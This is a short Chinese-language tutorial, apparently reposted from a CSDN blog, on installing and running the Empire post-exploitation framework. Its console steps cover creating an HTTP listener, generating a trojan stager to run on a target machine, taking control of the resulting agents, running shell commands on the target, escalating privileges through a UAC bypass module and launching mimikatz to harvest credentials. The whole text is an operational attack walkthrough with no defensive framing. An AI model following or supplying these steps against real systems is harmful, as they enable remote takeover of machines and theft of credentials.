Emprie使用说明
安装Empire
- 第一种方法
git clone https://github.com/EmpireProject/Empire.git
cd /Empire/setup/
./install.sh
./reset.sh
- 第二种方法
wget 网址
unzip Empire.zip
docker pull empireproject/empire
./reset.sh
注:网络状态不好导致部分组建下载失败,就多次执行安装命令
使用
- 运行empire:
./empire - 设置监听
- 进入监听模块,输入:
listeners - 列出可以监听类:
uselistener空格加按两下tab键 - 使用http,即输入:
uselistener http - 查看监听类信息:
info - 设置name参数:
set Name 监听器名 - 设置其他参数(
set Host 172.16.8.25:33678【设置ip和port】),如ip、port,可不设置(默认本机地址&一个端口) - 执行:
execute - 查看已有监听器:listener模块下输入
list
- 进入监听模块,输入:
- 生成木马
- 进入监听器模式:
back - 进入木马生成模块:
usestager - 选择木马类型:
usestager 木马类型名(按两下tab获取所有的木马类型) - 查看木马信息:
info - 设置监听器:
set Listener 监听器名 - 执行:
execute
- 进入监听器模式:
- 运行木马
- 在目标机上运行木马
- 到listener模式下监听:
back - 查看agents:
agents - 使用agents:
interact agents名字 - 查看可运行命令:
help - 目标系统上执行命令:
shell 系统密码
- 提权
- 选取提权模块:
usemodule privesc/bypassuac - 设置监听器:
set Listener 监听器名 - 执行:
execute,如提示都按y - 回到agents模式下:
back两次 - 列出agents:
list,发现有新的高权限agent - 使用高权限agents:
interact agents名字(名字带*号) - 执行mimikatz:
mimikatz
- 选取提权模块:
来源:CSDN
作者:xiang_xiang1314
链接:https://blog.csdn.net/xiang_xiang1314/article/details/103560958